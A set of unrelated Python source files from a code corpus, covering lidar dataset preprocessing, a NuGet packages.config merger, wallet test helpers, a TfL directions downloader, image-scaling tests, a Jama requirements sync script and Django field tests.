if 'objects/pose/t' in inputs:
prepared_inputs[standard_fields.InputDataFields
.objects_center] = inputs['objects/pose/t']
if 'objects/shape/dimension' in inputs:
prepared_inputs[
standard_fields.InputDataFields.objects_length] = tf.reshape(
inputs['objects/shape/dimension'][:, 0], [-1, 1])
prepared_inputs[standard_fields.InputDataFields.objects_width] = tf.reshape(
inputs['objects/shape/dimension'][:, 1], [-1, 1])
prepared_inputs[
standard_fields.InputDataFields.objects_height] = tf.reshape(
inputs['objects/shape/dimension'][:, 2], [-1, 1])
if 'objects/category/label' in inputs:
prepared_inputs[standard_fields.InputDataFields.objects_class] = tf.reshape(
inputs['objects/category/label'], [-1, 1])
if valid_object_classes is not None:
valid_objects_mask = tf.cast(
tf.zeros_like(
prepared_inputs[standard_fields.InputDataFields.objects_class],
dtype=tf.int32),
dtype=tf.bool)
for object_class in valid_object_classes:
valid_objects_mask = tf.logical_or(
valid_objects_mask,
tf.equal(
prepared_inputs[standard_fields.InputDataFields.objects_class],
object_class))
valid_objects_mask = tf.reshape(valid_objects_mask, [-1])
for key in standard_fields.get_input_object_fields():
if key in prepared_inputs:
prepared_inputs[key] = tf.boolean_mask(prepared_inputs[key],
valid_objects_mask)
if max_object_distance_from_source is not None:
if standard_fields.InputDataFields.objects_center in prepared_inputs:
object_distances = tf.norm(
prepared_inputs[standard_fields.InputDataFields.objects_center][:,
0:2],
axis=1)
valid_mask = tf.less(object_distances, max_object_distance_from_source)
for key in standard_fields.get_input_object_fields():
if key in prepared_inputs:
prepared_inputs[key] = tf.boolean_mask(prepared_inputs[key],
valid_mask)
return prepared_inputs
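# Illustrative wiring (a sketch, not part of the original module): a prepare_*
# function like the one above is typically mapped over a tf.data.Dataset of
# decoded feature dictionaries. The `dataset` variable and the class ids below
# are assumptions made for this example only.
#
#   import functools
#   prepare_fn = functools.partial(
#       prepare_waymo_open_dataset,
#       valid_object_classes=[1, 2],                # hypothetical class ids
#       max_object_distance_from_source=74.88)
#   dataset = dataset.map(prepare_fn, num_parallel_calls=tf.data.AUTOTUNE)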
@gin.configurable
def prepare_kitti_dataset(inputs, valid_object_classes=None):
"""Maps the fields from loaded input to standard fields.
Args:
inputs: A dictionary of input tensors.
    valid_object_classes: List of valid object classes. If None, it is ignored.
Returns:
A dictionary of input tensors with standard field names.
"""
prepared_inputs = {}
prepared_inputs[standard_fields.InputDataFields.point_positions] = inputs[
standard_fields.InputDataFields.point_positions]
prepared_inputs[standard_fields.InputDataFields.point_intensities] = inputs[
standard_fields.InputDataFields.point_intensities]
prepared_inputs[standard_fields.InputDataFields
.camera_intrinsics] = inputs['cameras/cam02/intrinsics/K']
prepared_inputs[standard_fields.InputDataFields.
camera_rotation_matrix] = inputs['cameras/cam02/extrinsics/R']
prepared_inputs[standard_fields.InputDataFields
.camera_translation] = inputs['cameras/cam02/extrinsics/t']
prepared_inputs[standard_fields.InputDataFields
.camera_image] = inputs['cameras/cam02/image']
prepared_inputs[standard_fields.InputDataFields
.camera_raw_image] = inputs['cameras/cam02/image']
prepared_inputs[standard_fields.InputDataFields
.camera_original_image] = inputs['cameras/cam02/image']
if 'scene_name' in inputs and 'frame_name' in inputs:
prepared_inputs[
standard_fields.InputDataFields.camera_image_name] = tf.strings.join(
[inputs['scene_name'], inputs['frame_name']], separator='_')
if 'objects/pose/R' in inputs:
prepared_inputs[standard_fields.InputDataFields
.objects_rotation_matrix] = inputs['objects/pose/R']
if 'objects/pose/t' in inputs:
prepared_inputs[standard_fields.InputDataFields
.objects_center] = inputs['objects/pose/t']
if 'objects/shape/dimension' in inputs:
prepared_inputs[
standard_fields.InputDataFields.objects_length] = tf.reshape(
inputs['objects/shape/dimension'][:, 0], [-1, 1])
prepared_inputs[standard_fields.InputDataFields.objects_width] = tf.reshape(
inputs['objects/shape/dimension'][:, 1], [-1, 1])
prepared_inputs[
standard_fields.InputDataFields.objects_height] = tf.reshape(
inputs['objects/shape/dimension'][:, 2], [-1, 1])
if 'objects/category/label' in inputs:
prepared_inputs[standard_fields.InputDataFields.objects_class] = tf.reshape(
inputs['objects/category/label'], [-1, 1])
if valid_object_classes is not None:
valid_objects_mask = tf.cast(
tf.zeros_like(
prepared_inputs[standard_fields.InputDataFields.objects_class],
dtype=tf.int32),
dtype=tf.bool)
for object_class in valid_object_classes:
valid_objects_mask = tf.logical_or(
valid_objects_mask,
tf.equal(
prepared_inputs[standard_fields.InputDataFields.objects_class],
object_class))
valid_objects_mask = tf.reshape(valid_objects_mask, [-1])
for key in standard_fields.get_input_object_fields():
if key in prepared_inputs:
prepared_inputs[key] = tf.boolean_mask(prepared_inputs[key],
valid_objects_mask)
return prepared_inputs
@gin.configurable
def prepare_proxy_dataset(inputs):
"""Maps the fields from loaded input to standard fields.
Args:
inputs: A dictionary of input tensors.
Returns:
A dictionary of input tensors with standard field names.
"""
prepared_inputs = {}
# Points
prepared_inputs[standard_fields.InputDataFields.point_positions] = inputs[
standard_fields.InputDataFields.point_positions]
prepared_inputs[standard_fields.InputDataFields.point_intensities] = inputs[
standard_fields.InputDataFields.point_intensities]
# Camera
prepared_inputs[
standard_fields.InputDataFields.camera_intrinsics] = tf.reshape(
inputs['camera_intrinsics'], [3, 3])
prepared_inputs[
standard_fields.InputDataFields.camera_rotation_matrix] = tf.reshape(
inputs['camera_rotation_matrix'], [3, 3])
prepared_inputs[
standard_fields.InputDataFields.camera_translation] = tf.reshape(
inputs['camera_translation'], [3])
prepared_inputs[
standard_fields.InputDataFields.camera_image] = inputs['image']
prepared_inputs[
standard_fields.InputDataFields.camera_raw_image] = inputs['image']
prepared_inputs[
standard_fields.InputDataFields.camera_original_image] = inputs['image']
prepared_inputs[standard_fields.InputDataFields
.camera_image_name] = _random_string_generator()
# objects pose
prepared_inputs[
standard_fields.InputDataFields.objects_rotation_matrix] = tf.reshape(
inputs['objects_rotation'], [-1, 3, 3])
prepared_inputs[standard_fields.InputDataFields.objects_center] = tf.reshape(
inputs['objects_center'], [-1, 3])
# objects size
prepared_inputs[standard_fields.InputDataFields.objects_length] = tf.reshape(
inputs['objects_length'], [-1, 1])
prepared_inputs[standard_fields.InputDataFields.objects_width] = tf.reshape(
inputs['objects_width'], [-1, 1])
prepared_inputs[standard_fields.InputDataFields.objects_height] = tf.reshape(
inputs['objects_height'], [-1, 1])
# labels
prepared_inputs[standard_fields.InputDataFields.objects_class] = tf.reshape(
inputs['objects_class'], [-1, 1])
return prepared_inputs
def compute_kitti_difficulty(boxes, occlusions, truncations, image_height):
"""Computes box difficulty as Hard(1), Moderate(2), Easy(3) or 0 (Super hard).
Easy: height >=40 Px, occlusion <= 0, truncation <= 0.15
Moderate: height >=25 Px, occlusion <= 1, truncation <= 0.30
Hard: height >=25 Px, occlusion <= 2, truncation <= 0.50
Note that 'Hard' box is also 'Moderate' and 'Easy'.
  Returns a (N, 1) tensor containing object difficulty with the following labelmap:
0: SuperHard
1: Hard
2: Moderate
3: Easy
TODO(abhijitkundu): Since difficulty level is very specific to kitti, this
function should be in kitti evaluation rather than detection preprocessor.
Args:
boxes: (N, 4) tensor of 2d boxes with [ymin, xmin, ymax, xmax] each row.
occlusions: (N, 1) tensor containing box occlusion level
truncations: (N, 1) tensor containing box truncation level
image_height: Image height.
Returns:
A (N, 1) int32 tensor containing per box difficulty labels with 0 (SuperHard),
1 (Hard), 2 (Moderate) and 3 (Easy).
"""
# box heights in pixels
heights = tf.reshape((boxes[:, 2] - boxes[:, 0]), [-1, 1]) * tf.cast(
image_height, dtype=tf.float32)
# compute binary masks for each difficulty level
is_easy = (heights >= 40.0) & (occlusions <= 0) & (truncations <= 0.15)
is_moderate = (heights >= 25.0) & (occlusions <= 1) & (truncations <= 0.30)
is_hard = (heights >= 25.0) & (occlusions <= 2) & (truncations <= 0.50)
# set difficulty map
difficulty = tf.maximum(
tf.maximum(
tf.cast(is_hard, dtype=tf.int32) * ObjectDifficulty.HARD,
tf.cast(is_moderate, dtype=tf.int32) * ObjectDifficulty.MODERATE),
tf.cast(is_easy, dtype=tf.int32) * ObjectDifficulty.EASY)
return difficulty
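# Worked example (illustrative values, not from the original source): with
# image_height=375, a normalized box [0.2, 0.1, 0.4, 0.6] has pixel height
# (0.4 - 0.2) * 375 = 75. With occlusion 0 and truncation 0.1 it satisfies all
# three masks, and the tf.maximum chain keeps the largest label, so the result
# is Easy (3). A 30 px box with occlusion 2 and truncation 0.4 only satisfies
# is_hard, giving Hard (1); a box under 25 px fails every mask and stays 0.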
def get_waymo_per_frame_with_prediction_feature_spec(
num_object_classes,
encoded_features_dimension,
include_encoded_features=True):
"""Returns a tfds feature spec with regular per frame entries and predictions.
Args:
num_object_classes: Number of object classes.
encoded_features_dimension: Encoded features dimension.
include_encoded_features: If True, it will include encoded features.
Otherwise, it will not include them.
Returns:
A tfds feature spec.
"""
prediction_feature_dict = {
standard_fields.DetectionResultFields.object_rotation_matrix_points:
tfds.features.Tensor(shape=(None, 3, 3), dtype=tf.float32),
standard_fields.DetectionResultFields.object_length_points:
tfds.features.Tensor(shape=(None, 1), dtype=tf.float32),
standard_fields.DetectionResultFields.object_height_points:
tfds.features.Tensor(shape=(None, 1), dtype=tf.float32),
standard_fields.DetectionResultFields.object_width_points:
tfds.features.Tensor(shape=(None, 1), dtype=tf.float32),
standard_fields.DetectionResultFields.object_center_points:
tfds.features.Tensor(shape=(None, 3), dtype=tf.float32),
standard_fields.DetectionResultFields.object_semantic_points:
tfds.features.Tensor(
shape=(None, num_object_classes), dtype=tf.float32),
standard_fields.DetectionResultFields.objects_rotation_matrix:
tfds.features.Tensor(shape=(None, 3, 3), dtype=tf.float32),
standard_fields.DetectionResultFields.objects_length:
tfds.features.Tensor(shape=(None, 1), dtype=tf.float32),
standard_fields.DetectionResultFields.objects_height:
tfds.features.Tensor(shape=(None, 1), dtype=tf.float32),
standard_fields.DetectionResultFields.objects_width:
tfds.features.Tensor(shape=(None, 1), dtype=tf.float32),
standard_fields.DetectionResultFields.objects_center:
tfds.features.Tensor(shape=(None, 3), dtype=tf.float32),
standard_fields.DetectionResultFields.objects_class:
tfds.features.Tensor(shape=(None, 1), dtype=tf.float32),
standard_fields.DetectionResultFields.objects_score:
tfds.features.Tensor(shape=(None, 1), dtype=tf.float32),
}
if include_encoded_features:
prediction_feature_dict[standard_fields.DetectionResultFields
.encoded_features_points] = tfds.features.Tensor(
shape=(None, encoded_features_dimension),
dtype=tf.float32)
prediction_feature_dict[standard_fields.DetectionResultFields
.objects_encoded_features] = tfds.features.Tensor(
shape=(None, encoded_features_dimension),
dtype=tf.float32)
prediction_feature_spec = tfds.features.FeaturesDict(prediction_feature_dict)
output_feature_spec_dict = {
k: v for k, v in waymo_frames.FRAME_FEATURE_SPEC.items()
}
output_feature_spec_dict['predictions'] = prediction_feature_spec
return tfds.features.FeaturesDict(output_feature_spec_dict)
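# Usage sketch (an assumption, not taken from the original file): the returned
# FeaturesDict can be handed to tfds tooling that expects a feature spec, e.g.
#   spec = get_waymo_per_frame_with_prediction_feature_spec(
#       num_object_classes=10, encoded_features_dimension=64)
# where spec['predictions'] then describes the variable-length prediction
# tensors listed above.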
| StarcoderdataPython |
1784148 | from xml.etree.cElementTree import parse, Element, ElementTree, dump
from os import walk
from os.path import join
from optparse import OptionParser
description = "Update the master packages.config from individual project ones."
command_group = "Developer tools"
# Snippet used from the ElementTree documentation.
# Tidy up the indentation of XML elements.
def indent(elem, level=0):
i = "\n" + level*" "
if len(elem):
if not elem.text or not elem.text.strip():
elem.text = i + " "
if not elem.tail or not elem.tail.strip():
elem.tail = i
for elem in elem:
indent(elem, level+1)
if not elem.tail or not elem.tail.strip():
elem.tail = i
else:
if level and (not elem.tail or not elem.tail.strip()):
elem.tail = i
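# Illustrative effect (not from the original script): a tree such as
#   <packages><package id="A" /><package id="B" /></packages>
# serializes on a single line by default; calling indent(root) first places
# each <package/> element on its own line with two-space indentation, which is
# what keeps the generated packages.config readable and diff-friendly.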
def parse_args():
usage = (
"\n"+
" %prog\n"+
"\n"+
"Update the master projectdata/packages.config from all the individual project\n"+
"package.config files throught the src/ directory.")
parser = OptionParser(usage=usage)
return parser.parse_args()
def match(value, target_string):
for target in target_string.split("|"):
if target=="":
return True
if target==value:
return True
return False
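# Behaviour of match() (illustrative, based on the code above):
#   match("1.2.3", "1.2.3|2.0.0")  ->  True   (one alternative matches exactly)
#   match("1.2.3", "2.0.0")        ->  False
#   match("1.2.3", "")             ->  True   (an empty target acts as a wildcard)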
def main():
options, args = parse_args()
rootElement = Element('packages')
packages = {}
print "Searching for packages.config files:"
for dirpath, subdirs, filenames in walk('src'):
for filename in filenames:
if filename == 'packages.config':
filepath = join(dirpath, filename)
print " " + filepath
et = parse(filepath)
for packageElement in et.findall('package'):
pkgId = packageElement.get('id')
pkgVersion = packageElement.get('version')
packages[pkgId, pkgVersion] = packageElement
print
print "Writing projectdata/packages.config:"
rootElement.extend([value for (key,value) in sorted(packages.items())])
indent(rootElement)
tree = ElementTree(rootElement)
dump(tree)
tree.write('projectdata/packages.config')
if __name__ == "__main__":
main()
| StarcoderdataPython |
4819507 | import os
import random
import mnemonic
import string
from pyblake2 import blake2b
import base58
def generate_mnemonic(language='english'):
""" Generate Mnemonic: Creates insecure random nmemonics for testing
Args:
language (str): defaults to english , all bip languages are supported.
Returns:
(str): a list of mnemonic words separated by spaces
Notes:
These values MUST not be used for wallets with real ADA as they are
not securely generated so could be predictable.
"""
phrase_generator = mnemonic.Mnemonic(language)
# make some insecure entropy
strength_bits = 128
entropy = os.urandom(strength_bits // 8)
# make a phrase from it
return phrase_generator.to_mnemonic(entropy)
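# Example (illustrative): 128 bits of entropy map to a 12-word BIP-0039 phrase,
# so a quick sanity check could look like
#   phrase = generate_mnemonic()
#   assert len(phrase.split()) == 12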
def check_mnemonic(string, language='english'):
""" Check menmonic:
Uses the python mnemonic library to check the supplied mnemonic is complies to the BIP-0039 standards
Args:
string(str): a list of mnemonic words seperated by spaces to be checked
languge(str): a language to verify the mnemonic in , defaults to english
"""
object = mnemonic.Mnemonic(language)
return object.check(string)
def generate_walletname(evil=0, length=8):
""" Generate Walletname: Creates wallet names of varying lengths and evilness
Args:
        evil (int): 0 = alphanumeric, 1 = punctuation, 2 = any printable character
        length (int): length of wallet name
    Notes:
        Python string constants are used to create the character lists
https://docs.python.org/3.4/library/string.html
"""
string_options = str
# configurable levels of evil content for wallet names
if evil == 0:
string_options = string.ascii_uppercase + string.digits
if evil == 1:
string_options = string.punctuation
if evil == 2:
string_options = string.printable
return ''.join(random.choices(string_options, k=length))
def encode_spending_password(string):
"""" Create a blake2 hash and base58 encode it for use as a spending password
Args:
string(str): a string to encode as a password
Returns:
bytes: base58 encoding string
"""
# might need to do some padding
bl = blake2b(string.encode('utf-8'), digest_size=24)
return base58.b58encode(bl.digest())
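# Example (illustrative; the exact value depends on the BLAKE2b digest):
#   pw = encode_spending_password("hunter2")
# pw is a bytes object of roughly 33 base58 characters, since the 24-byte
# digest grows by about log(256)/log(58) when base58-encoded.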
def generate_spending_password(evil=0, length=16):
"""" Generate a spending password and encode it
Args:
evil (int): 1 = alphanumeric , 2 = punctuation , 3 = any printable charecter
length (int): length of wallet name
Returns:
bytes: base58 encoded password
"""
    return encode_spending_password(generate_walletname(evil=evil, length=length))
| StarcoderdataPython |
1739075 | <gh_stars>0
import os
import json
import requests
import datetime
import time
from tqdm import tqdm
from multiprocessing import Pool
def divide_chunks(l, n):
for i in range(0, len(l), n):
yield l[i : i + n]
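# Example (illustrative): divide_chunks yields fixed-size slices, with a
# shorter final chunk when the length is not a multiple of n:
#   list(divide_chunks([1, 2, 3, 4, 5], 2))  ->  [[1, 2], [3, 4], [5]]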
app_key = ""
app_id = ""
with open("credentials.json", "r") as cred_file:
creds = json.load(cred_file)
app_key = creds["tfl_app_key"]
app_id = creds["tfl_app_id"]
def get_new_directions(res):
torrington_place_id = "1013720"
request_string = (
"https://api.tfl.gov.uk/Journey/JourneyResults/"
+ res["address"].replace(" ", "%20").replace(",", "%2C")
+ "/to/"
+ torrington_place_id
+ "?nationalSearch=false&journeyPreference=LeastTime&app_key="
+ app_key
+ "&app_id="
+ app_id
)
response = requests.get(url=request_string)
try:
return response.json()
except json.JSONDecodeError as err:
print(err)
return {"status": "fail"}
def convert_direction_json_to_routes(directions):
if not "journeys" in directions.keys():
return []
routes = []
for journey in directions["journeys"]:
route = {}
legs = []
for leg in journey["legs"]:
summary = leg["instruction"]["summary"]
dest = summary.split(" to ")[-1]
if "Walk " in summary:
legs.append({"type": "walk", "dest": dest, "duration": leg["duration"]})
elif " line " in summary:
line = summary.split(" to ")[0]
legs.append(
{
"type": "tube",
"dest": dest,
"duration": leg["duration"],
"line": line,
}
)
else:
bus_num = summary.split(" bus ")[0]
legs.append(
{
"type": "bus",
"dest": dest,
"duration": leg["duration"],
"line": bus_num,
}
)
route["legs"] = legs
route["total_duration"] = sum(map(lambda x: x["duration"], legs))
already_exists = False
for other_route in routes:
if len(other_route["legs"]) == len(route["legs"]):
match = True
for i in range(len(route["legs"])):
match = (
match
and route["legs"][i]["type"] == other_route["legs"][i]["type"]
)
if match:
match = (
match
and route["legs"][i]["dest"]
== other_route["legs"][i]["dest"]
)
if route["legs"][i]["type"] != "walk":
match = (
match
and route["legs"][i]["line"]
== other_route["legs"][i]["line"]
)
if match:
already_exists = True
break
if not already_exists:
routes.append(route)
return routes
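# Shape of the result (a sketch inferred from the code above, not an exhaustive
# schema): each deduplicated route looks roughly like
#   {"legs": [{"type": "walk", "dest": "...", "duration": 5},
#             {"type": "tube", "dest": "...", "duration": 12, "line": "Victoria"}],
#    "total_duration": 17}
# where "line" is only present for "tube" and "bus" legs.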
def download_and_save_directions_single(path):
prop = json.load(open(path + "/property.json", "r"))
directions = get_new_directions(prop)
routes = convert_direction_json_to_routes(directions)
with open(path + "/directions.json", "w+") as directions_file:
directions_file.write(json.dumps(directions, indent=4))
for i in range(len(routes)):
with open(path + "/route_" + str(i) + ".json", "w+") as route_file:
route_file.write(json.dumps(routes[i], indent=4))
def download_and_save_directions():
start = datetime.datetime.now()
file_paths = []
with open("property_index.json", "r") as index_file:
file_paths = json.load(index_file)
for path in file_paths:
if os.path.exists(path + "/directions.json"):
os.remove(path + "/directions.json")
i = 0
while os.path.exists(path + "/route_" + str(i) + ".json"):
os.remove(path + "/route_" + str(i) + ".json")
i += 1
print("getting directions for", len(file_paths), "properties")
split_file_paths = list(divide_chunks(file_paths, 450))
for i in range(len(split_file_paths)):
chunk_of_paths = split_file_paths[i]
print("starting on chunk", i, "of length", len(chunk_of_paths))
with Pool(len(chunk_of_paths)) as p:
print("worker pool started, requesting and downloading data...")
p.map(download_and_save_directions_single, chunk_of_paths)
if i + 1 < len(split_file_paths):
            # need to wait because TFL doesn't allow more than 500 requests per minute
print("waiting")
for t in tqdm(range(6000)):
time.sleep(0.01)
print("done,", (datetime.datetime.now() - start).total_seconds(), "s")
def check_all_properties_have_directions():
file_paths = []
with open("property_index.json", "r") as index_file:
file_paths = json.load(index_file)
    disambiguations = []
for path in file_paths:
if not os.path.exists(path + "/property.json") or not os.path.exists(
path + "/directions.json"
):
print(path)
with open(path + "/directions.json", "r") as dir_file:
directions = json.load(dir_file)
if not "journeys" in directions:
# print(path + "/directions.json")
            disambiguations.append(path)
    print("got", len(disambiguations), "disambiguations")
if __name__ == "__main__":
download_and_save_directions()
check_all_properties_have_directions()
| StarcoderdataPython |
144890 | import numpy as np
import pytest
from ome_zarr.scale import Scaler
class TestScaler:
@pytest.fixture(
params=(
(1, 2, 1, 256, 256),
(3, 512, 512),
(256, 256),
),
ids=["5D", "3D", "2D"],
)
def shape(self, request):
return request.param
def create_data(self, shape, dtype=np.uint8, mean_val=10):
rng = np.random.default_rng(0)
return rng.poisson(mean_val, size=shape).astype(dtype)
def check_downscaled(self, downscaled, shape, scale_factor=2):
expected_shape = shape
for data in downscaled:
assert data.shape == expected_shape
expected_shape = expected_shape[:-2] + tuple(
sh // scale_factor for sh in expected_shape[-2:]
)
def test_nearest(self, shape):
data = self.create_data(shape)
scaler = Scaler()
downscaled = scaler.nearest(data)
self.check_downscaled(downscaled, shape)
# this fails because of wrong channel dimension; need to fix in follow-up PR
@pytest.mark.xfail
def test_gaussian(self, shape):
data = self.create_data(shape)
scaler = Scaler()
downscaled = scaler.gaussian(data)
self.check_downscaled(downscaled, shape)
# this fails because of wrong channel dimension; need to fix in follow-up PR
@pytest.mark.xfail
def test_laplacian(self, shape):
data = self.create_data(shape)
scaler = Scaler()
downscaled = scaler.laplacian(data)
self.check_downscaled(downscaled, shape)
def test_local_mean(self, shape):
data = self.create_data(shape)
scaler = Scaler()
downscaled = scaler.local_mean(data)
self.check_downscaled(downscaled, shape)
@pytest.mark.skip(reason="This test does not terminate")
def test_zoom(self, shape):
data = self.create_data(shape)
scaler = Scaler()
downscaled = scaler.zoom(data)
self.check_downscaled(downscaled, shape)
| StarcoderdataPython |
1791615 | import logging
from bs4 import BeautifulSoup
from dateutil import parser
from config import Config
from jamaClient import JamaClient
class Process:
def __init__(self):
self.jama_client = JamaClient()
self.items = []
self.jama_config = Config()
self.jama_client.setConfig(self.jama_config)
self.item_type_ID = self.jama_config.testCaseStepItemTypeID
self.realtionship_type_ID = self.jama_config.relationshipTypeID
self.updateCount = 0
self.failedCount = 0
self.totalCount = 0
self.projectID = self.jama_config.projectID
self.successfulPostRelationshipCount = 0
self.failedToPostRelationshipCount = 0
self.failedToDeleteRelationshipCount = 0
self.successfulDeleteRelationshipCount = 0
def post_for_access_token(self):
self.jama_config.update_last_run_time()
def process(self):
self.useCaseField = self.jama_config.testCaseField
if self.useCaseField.endswith("$"):
self.useCaseField = self.useCaseField + str(self.item_type_ID)
# Get All Projects
if self.projectID != None:
url = "abstractitems?project=" + str(self.projectID) + "&itemType=" + str(self.item_type_ID)
else:
url = "abstractitems?itemType=" + str(self.item_type_ID)
items = self.jama_client.get_all(url)
if items == None:
self.jama_config.successLogger.log(logging.INFO, "No items retrieved from Jama for itemType [" + str(self.item_type_ID) + "]. No items to be processed.")
return
self.items = self.filter_items_from_last_run(items)
        if not self.items:
            self.jama_config.successLogger.log(logging.INFO, "No items found with a lastModifiedDate newer than the last run date of [" + str(self.jama_config.last_run_time) + "]. No items to be processed.")
return
self.totalCount = len(self.items)
self.jama_config.successLogger.log(logging.INFO, "Total number of items to process [" + str(self.totalCount) + "]")
for item in self.items:
self.process_item(item)
self.jama_config.successLogger.log(logging.INFO, "\n\n")
self.jama_config.successLogger.log(logging.INFO, "Number of successfully updated [" + str(self.updateCount) + "] item(s)")
self.jama_config.successLogger.log(logging.INFO, "Number of items with errors during updates [" + str(self.failedCount) + "]")
self.jama_config.successLogger.log(logging.INFO, "Number of successfully created relationships [" + str(self.successfulPostRelationshipCount) + "]")
self.jama_config.successLogger.log(logging.INFO, "Number of successfully deleted relationships [" + str(self.successfulDeleteRelationshipCount) + "]")
self.jama_config.successLogger.log(logging.INFO, "Number of failed created relationships [" + str(self.failedToPostRelationshipCount) + "]")
self.jama_config.successLogger.log(logging.INFO, "Number of failed deleted relationships [" + str(self.failedToDeleteRelationshipCount) + "]")
if self.failedToPostRelationshipCount > 0:
self.jama_config.failureLogger.log(logging.ERROR, "Number of relationships that failed to be created [" + str(self.failedToPostRelationshipCount) + "].")
if self.failedToDeleteRelationshipCount > 0:
self.jama_config.failureLogger.log(logging.ERROR, "Number of relationships that failed to be deleted [" + str(self.failedToDeleteRelationshipCount) + "].")
if self.failedCount > 0:
self.jama_config.failureLogger.log(logging.ERROR, "Number of items that failed to update [" + str(self.failedCount) + "/" + str(self.totalCount) + "].")
self.jama_config.update_last_run_time()
self.jama_config.successLogger.log(logging.INFO, "Finished...")
exit(0)
def process_item(self, item):
upstream_related_items = self.extract_upstream_related(item["id"])
linked_use_case_items = self.extract_field_linked_items(item["id"], item["fields"][self.useCaseField])
value = self.cross_reference(upstream_related_items, linked_use_case_items, item)
if value == True:
self.updateCount = self.updateCount + 1
self.jama_config.successLogger.log(logging.INFO, "Successfully updated item [" + str(item["id"]) + "]")
elif value == False:
self.failedCount = self.failedCount + 1
self.jama_config.successLogger.log(logging.INFO, "Encountered failures when updating item [" + str(item["id"]) + "]. Check the error logs for more information.")
else:
            lastRun = " [" + str(self.jama_config.last_run_time) + "]" if self.jama_config.last_run_time is not None else ""
            self.jama_config.successLogger.log(logging.INFO, "Item [" + str(item["id"]) + "] has not been modified since last run" + lastRun + ". No update necessary.")
def filter_items_from_last_run(self, items):
toReturn = []
for item in items:
if self.is_newer(item["modifiedDate"]):
toReturn.append(item)
return toReturn
def is_newer(self, lastModifiedDate):
modifiedDate = parser.parse(str(lastModifiedDate).rstrip(".000+0000"))
if self.jama_config.last_run_time == None or modifiedDate > self.jama_config.last_run_time:
return True
return False
def extract_upstream_related(self, itemId):
upstream_related_dict = []
upstream_links = self.jama_client.get_upstream_related(itemId=itemId)
for upstream_link in upstream_links:
item = {}
item.__setitem__("relationshipID", upstream_link["id"])
item.__setitem__("upstreamItem", upstream_link["fromItem"])
item.__setitem__("relationship", upstream_link)
upstream_related_dict.append(item)
self.jama_config.successLogger.log(logging.INFO, "Successfully extracted upstream related items for item [" + str(itemId) + "]")
return upstream_related_dict
def extract_field_linked_items(self, itemID, content):
dictionary = []
richText = BeautifulSoup(content, 'html.parser')
if richText is not None:
for link in richText.find_all('a'):
item = {}
item.__setitem__("id", self.parseId(link))
item.__setitem__("link", link)
dictionary.append(item)
self.jama_config.successLogger.log(logging.INFO, "Successfully extracted linked items from [" + self.jama_config.testCaseField + "] field for item [" + str(itemID) + "]")
return dictionary
def cross_reference(self, upstream_related_items, field_link_items, item):
patch = False
found = False
relationshipsToDelete = []
relationshipsToPost = []
## Check all upstream related items are located in the field_link_items
for upstream_related_item in upstream_related_items:
for link_item in field_link_items:
if upstream_related_item.get("upstreamItem") == link_item.get("id"):
found = True
break
if found == False:
relationshipsToDelete.append(upstream_related_item)
patch = True
found = False
## Check all field_link_items are valid upstream related items
for link_item in field_link_items:
for upstream_related_item in upstream_related_items:
if upstream_related_item.get("upstreamItem") == link_item.get("id"):
found = True
break
if found == False:
relationshipsToPost.append(link_item)
patch = True
found = False
if patch == True:
self.jama_config.successLogger.log(logging.INFO, "Item [" + str(item["id"]) + "] upstream related items require an update...")
success_delete = self.delete_relationships(relationshipsToDelete, item["id"])
success_post = self.post_item_relationships(relationshipsToPost, item["id"])
return success_delete or success_post
# return "UPDATED"
return None
def post_item_relationships(self, upstream_links, item):
relationships = []
for upstream_link in upstream_links:
relationship = self.create_relationship_post_payload(item, upstream_link["id"])
if relationship is not None:
relationships.append(relationship)
return self.post(itemID=item, relationships=relationships)
def post(self, itemID, relationships):
success = None
for relationship in relationships:
relationshipID = self.jama_client.post_relationship(relationship)
if relationshipID == None:
self.jama_config.successLogger.log(logging.WARNING, "Relationship [" + str(relationship) + "] already exists.")
self.successfulPostRelationshipCount = self.successfulPostRelationshipCount + 1
else:
try:
relationship_id = int(relationshipID)
if relationship_id != None:
if success == None:
success = True
self.jama_config.successLogger.log(logging.INFO, "Created relationship [" + str(relationship_id) + "] for item [" + str(itemID) + "]")
self.successfulPostRelationshipCount = self.successfulPostRelationshipCount + 1
except Exception as e:
success = False
self.jama_config.failureLogger.log(logging.ERROR, "Failed to create relationship [" + str(relationship) + "] for item [" + str(itemID) + "] due to [" + e.message + "]")
self.failedToPostRelationshipCount = self.failedToPostRelationshipCount + 1
return success
def delete_relationships(self, upstream_related_items, itemID):
success = None
for relationship in upstream_related_items:
response = self.jama_client.delete_relationship(relationship.get("relationshipID"))
if response == None:
if success == None:
success = True
self.jama_config.successLogger.log(logging.INFO, "Successfully deleted relationship [" + str(relationship.get("relationship")) + "] to update item [" + str(itemID) + "]")
self.successfulDeleteRelationshipCount = self.successfulDeleteRelationshipCount + 1
else:
success = False
self.jama_config.failureLogger.log(logging.ERROR, "Failed to deleted relationship [" + str(relationship.get("relationship")) + "] for item [" + str(itemID) + "]")
self.failedToDeleteRelationshipCount = self.failedToDeleteRelationshipCount + 1
return success
def parseId(self, item):
try:
string_starting_with_id = str(item)[str(item).index("docId=") + 6:]
item_id = string_starting_with_id[:string_starting_with_id.index("\" target")]
# self.jama_config.successLogger.log(logging.INFO, "Parsed item id [" + str(item_id) + "] from link [" + str(item) + "]")
return int(item_id)
except Exception as e:
self.jama_config.successLogger.log(logging.INFO, "Unable to extract item ID from reference [" + str(item) + "] -- SKIPPING")
def create_relationship_post_payload(self, itemID, upstreamRelatedID):
relationship = {}
relationship.__setitem__("fromItem", upstreamRelatedID)
relationship.__setitem__("toItem", itemID)
relationship.__setitem__("relationshipType", self.jama_config.relationshipTypeID)
return relationship
| StarcoderdataPython |
3212202 | <filename>DGF/__init__.py
from .fields import Field
from .models import Schema
from .combiner import Combiner
from .pipeline import BaseLink, QUERY, ADD, CHANGE, DELETE
from .auth.permission import BasePermission
from .auth.authenticator import BaseAuthenticator
from .auth.permission import BasePermission
from .exceptions import Unauthorized, SchemaException
| StarcoderdataPython |
3293146 | from .loss import EvidentialLossSumOfSquares
from .paper_loss import PaperEvidentialLossSumOfSquares
| StarcoderdataPython |
1696172 | <reponame>20c/django-inet<filename>tests/test_models.py
import ipaddress
import pytest
from django.core.exceptions import ValidationError
from django.test import TestCase
from models import FullModel
from django_inet.models import (
ASNField,
IPAddressField,
IPNetworkField,
IPPrefixField,
MacAddressField,
URLField,
)
def assert_ip_validator(obj):
"""
assert the validator is set correctly and referring to the correct object
"""
assert 0 == len(obj.default_validators)
assert 1 == len(obj.validators)
assert obj == obj.validators[0].field
assert obj.version == obj.validators[0].field.version
class ModelTests(TestCase):
"""test model functionality"""
def test_init(self):
new0 = URLField()
new1 = URLField()
assert 1 == len(new0.default_validators)
